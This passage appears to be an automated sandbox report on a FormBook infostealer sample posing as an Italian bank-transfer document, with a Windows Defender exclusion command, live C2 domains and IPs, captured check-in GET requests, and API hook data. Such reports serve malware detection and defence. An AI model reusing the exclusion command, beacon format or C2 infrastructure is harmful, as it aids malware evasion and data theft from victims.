                                SHA-512:458178CF74A9DB8817940EA9DAF336A8D783D8D5165CFD46F3E01D96BBD55E226F9C13B041CF5515DB0343848E78981E76D4BD4154B79275EEF4E2A1A29F71BC
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2278598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2268598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2258598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2248598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2238598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2228598928,"LastSwitchedHighPart":31061882,
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1172
                                Entropy (8bit):5.355024937536926
                                Encrypted:false
                                SSDEEP:24:3OWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:eWSU4xymI4RfoUeW+mZ9tK8ND3
                                MD5:4FF4EA0534E06DBD3B9C6078779177B5
                                SHA1:5DDA708CF64996323E26348C595E866596EE6F71
                                SHA-256:D02254F27E815DA15DC98673A240E97983532EC9C4740A6892925B5DE7560DAA
                                SHA-512:978C7DE1868842A0E66FC47B1009B841AC82F50954977D639E9CE6DD7F09A2272F8C9196CB4EE2260CBEEB5A99CD0A7C1C2CAB7552A45181B827120525E74E39
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.942608107835512
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                File size:643'584 bytes
                                MD5:6b799c2e76b37bf96ef35ba8580f0bfc
                                SHA1:b710a5aa6385f9424c37c944ef27d10ef99df97f
                                SHA256:e10280c91dc1fb46756d9473163eec9052b8c8a352955d0f21a24246da054ba2
                                SHA512:3d24d60ddf69dfe6c6124df627dadcb833d8339e59b446cf44a9ecf222d36e58e3d222c8b8f1937554236a0d6121d3fb0d423160ea473a5cd412c8aecac92823
                                SSDEEP:12288:3fGyCK2xrOonraIEGL78bDS8k67E7KJIojZKBZnU02gvPQ3WEF00QiHM:uyC5raI9L+DS8jkoVgT2KPQ3B9
                                TLSH:34D4220B7265CF21D6BE9BF56024202013F5FBA73D52DA6CAEC4A0EB2D79BD54601E43
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...bN................0.............2.... ........@.. .......................@............@................................
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0x49e632
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x9ED14E62 [Mon Jun 8 07:40:18 2054 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9e5df | 0x4f | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa0000 | 0x5ac | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa2000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9c26c | 0x70 | .text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0x9c638 | 0x9c800 | 097f60be93bf7226152b8eedda64f4e3 | False | 0.9499971919928115 | data | 7.94939514943548 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc | 0xa0000 | 0x5ac | 0x600 | 76a41dbf1d0b15414e71e9cefd7df29b | False | 0.4205729166666667 | data | 4.080984014354251 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0xa2000 | 0xc | 0x200 | a205a90496ba84f1f4dbc9ab25f17309 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_VERSION | 0xa0090 | 0x31c | data | | | 0.435929648241206
                                RT_MANIFEST | 0xa03bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                DLL | Import
                                mscoree.dll | _CorExeMain
                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                06/21/24-16:14:50.292769 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49716 | 80 | 192.168.2.11 | 188.114.96.3
                                06/21/24-16:17:32.715564 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 64867 | 80 | 192.168.2.11 | 188.114.96.3
                                06/21/24-16:16:30.997720 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 64864 | 80 | 192.168.2.11 | 185.53.179.92
                                06/21/24-16:17:12.110813 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 64866 | 80 | 192.168.2.11 | 192.64.118.107
                                06/21/24-16:18:16.654776 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 64868 | 80 | 192.168.2.11 | 107.158.172.173
                                06/21/24-16:15:50.125620 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 64862 | 80 | 192.168.2.11 | 3.64.163.50
                                06/21/24-16:16:51.501355 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 64865 | 80 | 192.168.2.11 | 103.169.142.0
                                06/21/24-16:16:10.912575 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 64863 | 80 | 192.168.2.11 | 172.67.158.16
                                06/21/24-16:15:29.832153 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 64861 | 80 | 192.168.2.11 | 188.114.97.3
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Jun 21, 2024 16:14:50.236855984 CEST | 192.168.2.11 | 1.1.1.1 | 0xc31e | Standard query (0) | www.jnhdh8827.com | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:15:10.846163034 CEST | 192.168.2.11 | 1.1.1.1 | 0x3f91 | Standard query (0) | www.loyalbahis356.com | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:15:29.673865080 CEST | 192.168.2.11 | 1.1.1.1 | 0x47c8 | Standard query (0) | www.sxybet88.com | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:15:49.879703999 CEST | 192.168.2.11 | 1.1.1.1 | 0xe316 | Standard query (0) | www.ainth.com | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:16:10.396253109 CEST | 192.168.2.11 | 1.1.1.1 | 0x9ff | Standard query (0) | www.motchillssss.top | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:16:30.942338943 CEST | 192.168.2.11 | 1.1.1.1 | 0xc2a7 | Standard query (0) | www.hemophilia-treatment-41433.bond | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:16:51.409219027 CEST | 192.168.2.11 | 1.1.1.1 | 0x6822 | Standard query (0) | www.paucanyes.com | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:17:12.088498116 CEST | 192.168.2.11 | 1.1.1.1 | 0x8c18 | Standard query (0) | www.ombak99.lol | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:17:32.586893082 CEST | 192.168.2.11 | 1.1.1.1 | 0x40f | Standard query (0) | www.shuaninvolved.site | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:18:15.930248022 CEST | 192.168.2.11 | 1.1.1.1 | 0xa72d | Standard query (0) | www.meidupro.com | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Jun 21, 2024 16:14:50.286693096 CEST | 1.1.1.1 | 192.168.2.11 | 0xc31e | No error (0) | www.jnhdh8827.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:14:50.286693096 CEST | 1.1.1.1 | 192.168.2.11 | 0xc31e | No error (0) | www.jnhdh8827.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:15:11.005785942 CEST | 1.1.1.1 | 192.168.2.11 | 0x3f91 | No error (0) | www.loyalbahis356.com | | 185.148.106.71 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:15:11.005785942 CEST | 1.1.1.1 | 192.168.2.11 | 0x3f91 | No error (0) | www.loyalbahis356.com | | 185.148.106.70 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:15:29.826004982 CEST | 1.1.1.1 | 192.168.2.11 | 0x47c8 | No error (0) | www.sxybet88.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:15:29.826004982 CEST | 1.1.1.1 | 192.168.2.11 | 0x47c8 | No error (0) | www.sxybet88.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:15:50.116858959 CEST | 1.1.1.1 | 192.168.2.11 | 0xe316 | No error (0) | www.ainth.com | | 3.64.163.50 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:16:10.898818970 CEST | 1.1.1.1 | 192.168.2.11 | 0x9ff | No error (0) | www.motchillssss.top | | 172.67.158.16 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:16:10.898818970 CEST | 1.1.1.1 | 192.168.2.11 | 0x9ff | No error (0) | www.motchillssss.top | | 104.21.33.26 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:16:30.988584995 CEST | 1.1.1.1 | 192.168.2.11 | 0xc2a7 | No error (0) | www.hemophilia-treatment-41433.bond | | 185.53.179.92 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:16:51.495197058 CEST | 1.1.1.1 | 192.168.2.11 | 0x6822 | No error (0) | www.paucanyes.com | | 103.169.142.0 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:17:12.104652882 CEST | 1.1.1.1 | 192.168.2.11 | 0x8c18 | No error (0) | www.ombak99.lol | ombak99.lol | | CNAME (Canonical name) | IN (0x0001) | false
                                Jun 21, 2024 16:17:12.104652882 CEST | 1.1.1.1 | 192.168.2.11 | 0x8c18 | No error (0) | ombak99.lol | | 192.64.118.107 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:17:32.665529966 CEST | 1.1.1.1 | 192.168.2.11 | 0x40f | No error (0) | www.shuaninvolved.site | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:17:32.665529966 CEST | 1.1.1.1 | 192.168.2.11 | 0x40f | No error (0) | www.shuaninvolved.site | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                Jun 21, 2024 16:18:16.649178982 CEST | 1.1.1.1 | 192.168.2.11 | 0xa72d | No error (0) | www.meidupro.com | | 107.158.172.173 | A (IP address) | IN (0x0001) | false
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.11 | 49716 | 188.114.96.3 | 80 | 2592 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Jun 21, 2024 16:14:50.292768955 CEST | 168 | OUT | GET /pz12/?Ft6LPF=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHU/iA/QpxM3q&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.jnhdh8827.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.11 | 64860 | 185.148.106.71 | 80 | 2592 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Jun 21, 2024 16:15:11.016506910 CEST | 172 | OUT | GET /pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.loyalbahis356.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 21, 2024 16:15:12.509788990 CEST | 1181 | IN | HTTP/1.1 301 Moved Permanently
                                Date: Fri, 21 Jun 2024 14:15:11 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 21 Jun 2024 15:15:11 GMT
                                Location: https://loyalbahis356.com/pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu
                                Set-Cookie: __cf_bm=2lLqNs2SKCx1Xu0IOb9AFqa17EzDs608CriSQeApRGc-1718979311-1.0.1.1-nK_wDYDzKFDXioN3Kfpx9wF6Ugt3dVArlnAt.sKPtq5QcPZeX8xLnmBA45TRM3tt07tLWTZ043_VgmkM1OZA1A; path=/; expires=Fri, 21-Jun-24 14:45:11 GMT; domain=.loyalbahis356.com; HttpOnly
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJRoLeU55y12qFbWCI7HpP9Nhc0ZIXhCX7%2F3ogdI6JKmjTnOex%2FGxQZOtmQH6FHGTQ%2F%2BULdcRdvHT2vdHTvUxitQDNmoJJbtHHqOvMX7uX58vJ2AwQpie1Y%2FExIelb3ds7kjm%2FCOXOY%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89749bf86ef54414-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.11 | 64861 | 188.114.97.3 | 80 | 2592 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Jun 21, 2024 16:15:29.832153082 CEST | 167 | OUT | GET /pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.sxybet88.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 21, 2024 16:15:30.291491032 CEST | 905 | IN | HTTP/1.1 301 Moved Permanently
                                Date: Fri, 21 Jun 2024 14:15:30 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 21 Jun 2024 15:15:30 GMT
                                Location: https://www.sxybet88.com/pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYHXtDyKE2o7nBb9dw6YtkFmJhoX6QEJiDLEQf7HxqJtr2Sb8gIwvVZdXLTZbjOcHHkCJpy0uHFLigYTySl6KfCk8hzeqN8UjvxvjHDHAsUWDKweJyEqvjOwny1tYKHulP1d"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89749c6df8e84205-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.11 | 64862 | 3.64.163.50 | 80 | 2592 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Jun 21, 2024 16:15:50.125619888 CEST | 164 | OUT | GET /pz12/?Ft6LPF=wKkXOPvX+avhNB0WpobAo/RdD5Vgm0uLsJUbUuPKtyZfimvU+K3iz8PSEmeh48r72CNx&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.ainth.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.11 | 64863 | 172.67.158.16 | 80 | 2592 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Jun 21, 2024 16:16:10.912575006 CEST | 171 | OUT | GET /pz12/?Ft6LPF=bG4RJrnXbim/D3cBlUwrMYqb2ZS77l+Go/8AkclYnXcXK2JRZ8TcvaCLEE/32UP8PfnZ&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.motchillssss.top
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.11 | 64864 | 185.53.179.92 | 80 | 2592 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Jun 21, 2024 16:16:30.997720003 CEST | 186 | OUT | GET /pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.hemophilia-treatment-41433.bond
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                6 | 192.168.2.11 | 64865 | 103.169.142.0 | 80 | 2592 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Jun 21, 2024 16:16:51.501354933 CEST | 168 | OUT | GET /pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.paucanyes.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 21, 2024 16:16:51.995676994 CEST | 749 | IN | HTTP/1.1 301 Moved Permanently
                                Date: Fri, 21 Jun 2024 14:16:51 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 21 Jun 2024 15:16:51 GMT
                                Location: https://www.paucanyes.com/pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu
                                expect-ct: max-age=86400, enforce
                                referrer-policy: same-origin
                                x-content-type-options: nosniff
                                x-frame-options: SAMEORIGIN
                                x-xss-protection: 1; mode=block
                                Server: cloudflare
                                CF-RAY: 89749e6c8b7f1881-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                7 | 192.168.2.11 | 64866 | 192.64.118.107 | 80 | 2592 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Jun 21, 2024 16:17:12.110812902 CEST | 166 | OUT | GET /pz12/?Ft6LPF=oHprbzlDionZVyQ1tKhLJIMMM9VbSt1+94xivpjLAu060YRgv/mETNkmThmCujjhO3iW&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.ombak99.lol
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                8 | 192.168.2.11 | 64867 | 188.114.96.3 | 80 | 2592 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Jun 21, 2024 16:17:32.715564013 CEST | 173 | OUT | GET /pz12/?Ft6LPF=QmILE5Yj5FPxS0L9f6nor9rKO5Y2+RnVUWg4I1d5MMTzUgBssQh0GRAykt5Xu8CyVf+z&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.shuaninvolved.site
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 21, 2024 16:17:33.188185930 CEST | 867 | IN | HTTP/1.1 404 Not Found
                                Date: Fri, 21 Jun 2024 14:17:33 GMT
                                Content-Type: text/html; charset=iso-8859-1
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLQJlLW8SkiYBMHFnts7gjykOqYs3BXybBPpNHRFAkouMnNPt1KPTATlxh6ESQYSk3GYuqdaepawogs7EV8f%2F3l%2BmF8Z3w1gryXSxlCXOgKcVQrt4NZ6A%2BGoGhFbJkrjkIlHLDCdoW9N"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89749f6dddaf4375-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.shuaninvolved.site Port 80</address></body></html>
                                Jun 21, 2024 16:17:33.188211918 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Code Manipulations

                                Function Name | Hook Type | Active in Processes
                                PeekMessageA | INLINE | explorer.exe
                                PeekMessageW | INLINE | explorer.exe
                                GetMessageW | INLINE | explorer.exe
                                GetMessageA | INLINE | explorer.exe

                                Function Name | Hook Type | New Data
                                PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEA
                                PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEA

                                Target ID:0
                                Start time:10:14:05
                                Start date:21/06/2024
                                Path:C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0x260000
                                File size:643'584 bytes
                                MD5 hash:6B799C2E76B37BF96EF35BA8580F0BFC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0x100000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff68cce0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0xc0000
                                File size:643'584 bytes
                                MD5 hash:6B799C2E76B37BF96EF35BA8580F0BFC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:6
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0x5f0000
                                File size:643'584 bytes
                                MD5 hash:6B799C2E76B37BF96EF35BA8580F0BFC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
